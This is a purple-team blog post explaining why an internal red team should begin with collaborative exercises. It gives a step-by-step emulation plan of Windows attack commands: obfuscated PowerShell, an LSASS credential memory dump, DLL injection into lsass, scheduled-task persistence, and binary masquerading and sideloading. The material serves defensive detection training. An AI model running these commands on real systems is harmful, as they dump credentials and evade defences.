I was chatting with a SANS STI student, Antonio Piazza, on Twitter and we realized that all the internal Red Teams we have built have gone from performing stealth, Red Team engagements to Purple Teaming relatively quickly. I talked about the Ethical Hacking Maturity Model in my first post on Shifting from Penetration Testing to Red Team and Purple Team and commented, “perhaps running a Purple Team Exercise before a stealth Red Team Engagement makes more sense for the collaborative goals of the program."
I have invited Antonio to collaborate with me on this blog as we dive into our experiences building internal Red Teams and why we think doing a Purple Team exercise before a stealth Red Team engagement may make more sense for your organization, especially when building out an internal program. Lastly, we will provide an actionable emulation plan, based on Red Canary’s 2022 Threat Detection Report, that you can run in your first Purple Team exercise.
Our Experience
As usual, we will caveat this advice with it being based on our experiences and that every organization is different. Your mileage may vary.
I (Antonio Piazza) have been working as an internal, corporate Red Team engineer for over 5 years now and have worked for many different companies in a few different industries including government, healthcare, and tech. I’ve noticed the same pattern everywhere I’ve been: The Red Team program is built, the Red Team does great work, the Blue Team falls behind, and the Red team is asked to move to a “more purple model."
This is no jab at corporate Blue Teams by any means. Many times this lag might be because a Red Team has far fewer moving parts than blue. The Blue Team has to purchase, install and configure a multitude of security tools. The analysts must learn to use the tools effectively and tune them for efficiency. They have the huge task of learning their tools, building their maturity, while operating to keep their enterprise secure.
Sometimes there might be an issue with budget, prioritization, headcount, and/or tool visibility. There are a multitude of reasons why the Red Team could appear to dominate the corporate infrastructure during operations, but I am not at all suggesting that the Red Team operators are any more skilled than the blue.
What I've commonly seen is that the Red Team has a hard time providing training value to the Blue Team via Red Team operations when blue maturity cannot keep up with red. In this instance, the Red Team is great at finding security flaws and holes in the environment, and assessing the effectiveness of security controls. This creates a backlog of findings for various security teams to fix, but where is the training value? Relationships between red and blue begin to deteriorate, because the Red Team is creating a lot of work for an already busy Blue Team. At some point your corporate leadership recognizes all of this and asks for more “collaboration". After all, a primary goal of the Red Team should be to provide training to your company's security operation teams. If your traditional Red Team operation is not providing that training value, your leadership will want to see this change. What your leadership is asking for is a Purple Team.
So, this begs the question, “Why don’t we just start purple?” Why don’t we avoid the inevitable problems and collaborate first?
An Updated Model
We both agreed that if we were asked to build an internal Red Team today, we most likely would go with a Purple Team Exercise first to baseline basic detection and get the teams collaborating before performing a stealth Red Team engagement. This takes the Ethical Hacking Maturity Model and modifies the order of assessments: Vulnerability Scanning, Vulnerability Assessment, Penetration Testing, Purple Team, Red Team, and Adversary Emulation.
As introduced in a previous post, we will leverage the Purple Team Exercise Framework. We won’t go through every single step as that was your homework. We will break it down in the four main steps: Cyber Threat Intelligence, Preparation, Exercise Execution, and Lessons Learned.
Cyber Threat Intelligence
In my second blog of the series, Cyber Kill Chain, MITRE ATT&CK, and Purple Team, we covered multiple frameworks and the adversary behaviors we care about for Red and Purple Teams: tactics, techniques, and procedures (emphasis on procedures).
For this post, we are going to leverage an annual report released by Red Canary that covers the most observed TTPs from the past year: Red Canary 2022 Threat Detection Report. Testing these TTPs makes sense for your first Purple Team exercise as they are used frequently and not something that is very advanced for a Red Team to emulate. Remember we are not only focusing on technology, but also in the collaboration between your teams and processes.
Picking the TTPs is part of the first step in the Purple Team Exercise Framework: Cyber Threat Intelligence. Ideally, you consult and include your internal Cyber Threat Intelligence team to prioritize which TTPs to prioritize (what TTPS are adversaries using to attack your company, or companies within your industry). However, you may not have an internal Cyber Threat Intelligence team or it may be new. For this post we are going to leverage the Red Canary report which does a fantastic job providing MITRE ATT&CK mapping for each behavior and breaking it up in sections: analysis, visibility, collection, detection, and testing.
The breakout and individual page for each TTP is easy to follow for anyone reading the report. We have broken it out following the PTEF template for mapping TTPs and made it available on the Community Threats GitHub.
Preparation: Tabletop Discussion
With the list of TTPs at the procedure level and an emulation plan, it is time to have a tabletop discussion. A tabletop discussion should be done before the exercise and involve stakeholders from different management lines. The reason for this is that expectations for each TTP will be discussed and documented. The expectations of a particular TTP may be different for different team members and management. During the tabletop, the following is discussed:
- CTI source
- Tactic
- Technique
- Procedure
- How to emulate the procedure
- Data Sources for detecting the procedure
- Expected Results
Leverage the Red Canary TTP mapping spreadsheet as you discuss the tactic, technique, and procedures from the Red Canary report, possible detections, and the expected results for your organization. Make sure to document all of this so you can compare and contrast with the actual result.
Exercise Execution: Red Team emulates the TTPs
While we built an attack chain and even automate these TTPs, the below plan is for manually executing the TTPs on a target system the Purple Team already has access to. This means there is no Initial Access or Command and Control. While a Red Team is required to do both, we are doing our first Purple Team engagement and can simulate those tactics to get the program off the ground.
You can manually execute each technique provided in the Red Canary 2022 Threat Detection Report on a target host by copying and pasting the below procedures. In a Purple Team exercise, you will share the Red Team screen so everyone sees the execution. You can do one TTP at a time or go through the whole emulation and then perform Detection Engineering.
1. `powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==`
* Execute this from a non-privileged cmd.exe
2. `%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt`
* Execute this from a non-privileged cmd.exe
* Clean up by executing: `del hello.txt`
3. `rundll32.exe pcwutl.dll,LaunchApplication C:\Windows\System32\notepad.exe`
* Execute this from a non-privileged cmd.exe
* Clean up by executing: `wmic process where name="notepad.exe" delete`
4. `wmic /node:"127.0.0.1" process call create “calc.exe”`
* Execute this from a non-privileged cmd.exe
* Clean up by executing: `wmic process where name="calc.exe" delete`
* Note the version of Windows may call the process `Calculator.exe` or `CalculatorApp.exe`
5. `rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\Windows\Temp\lsass.dmp full`
* Execute this from a privileged cmd.exe
* Clean up by executing: `del C:\Windows\Temp\lsass.dmp`
6. `(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt`
* Execute this from a non-privileged powershell.exe
* Clean up by executing: `wmic process where name="notepad.exe" delete`
* Clean up by executing: `del LICENSE.txt`
7. `mavinject.exe ((Get-Process lsass).Id) /INJECTRUNNING C:\Windows\System32\vbscript.dll`
* Execute this from a privileged powershell.exe
* Clean up by rebooting
8. `schtasks /Create /F /SC MINUTE /MO 3 /ST 07:00 /TN CMDTestTask /TR ""cmd /c date /T > C:\Windows\Temp\current_date.txt"`
* Execute this from a non-privileged cmd.exe
* Clean up by executing: `schtasks /Delete /TN CMDTestTask /F`
9. ```$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )```
* Execute this from a non-privileged powershell.exe
10. `copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Temp\notepad.exe` & `C:\Windows\Temp\notepad.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==`
* Execute this from a non-privileged cmd.exe
* Clean up by executing: `del C:\Windows\Temp\notepad.exe`
11. `Set-ExecutionPolicy Bypass -Scope Process -Force ; .\tweet.ps1`
* Download tweet.ps1 to the working directory
* Execute this from a non-privileged powershell.exe
* Clean up by executing: `del $Env:windir\Temp\svchost.exe`
12. `copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe` & `copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll` & `%APPDATA%\updater.exe -Command exit`
* Execute this from a non-privileged cmd.exe
* Clean up by executing: `del %APPDATA%\updater.exe` & `del %APPDATA%\amsi.dll`
Exercise Execution: Blue Team
All Purple Team participants were able to see the Red Team emulation, now it is the Blue Team’s turn to share their screen and go through their process to detect and respond to the emulated TTPs. The process is defined by the Blue Team but generally it goes like this:
- SOC analyst looks for alerts in the SIEM dashboard and then in individual security tool dashboards
- Hunt Team goes hunting for the behaviors first, then for IoCs if behaviors not found on central logging platform
- Digital Forensics and Incident Response leverage their tools or log in to the target system to identify the TTPs
The Red Canary Threat Detection report goes deep into each technique from a detection perspective (yes, that is the name of the report), so we will not duplicate that effort in this blog. However, we highly encourage you to dive deep into each technique in their report as it covers analysis, visibility, collection, and detection.
Lessons Learned
As the exercise is occurring, an exercise coordinator should be taking notes for each TTP. These can be added to the Red Canary TTP mapping spreadsheet we provide in the GitHub or use any other method you have for tracking (that will be part of another blog in this series). Showing the current results and the improvements that are possible through detection engineering (also another post in this series) is where the Purple Team value is!
The most important part is that you have tested and measured your current security posture to detect some of the most used TTPs currently being seen in the wild. If the Blue Team was able to detect and respond to all, or a high percentage, of these TTPs, you are ready to continue your journey maturing and testing more sophisticated TTPs. If not, you have collaborated and will not improve the detections on these TTPs before moving on to the next step of your journey.
Conclusion
Antonio Piazza and Jorge Orchilles have concluded that if they are asked to build an internal Red Team program today, they would start with a Purple Team Exercise. Building a collaborative culture between the information security teams will result in more efficient improvements in the overall security posture. Once there is a baseline and processes for testing, measuring, and improving, then we can mature further to stealth Red Team engagements.
We hope you found this blog useful and I want to thank Antonio for collaborating with me on this one! Give Antonio Piazza a follow on Twitter.
If you'd like to get more training on Purple Teams, sign up for our upcoming Purple Team Workshop! https://www.scythe.io/training
Related Articles
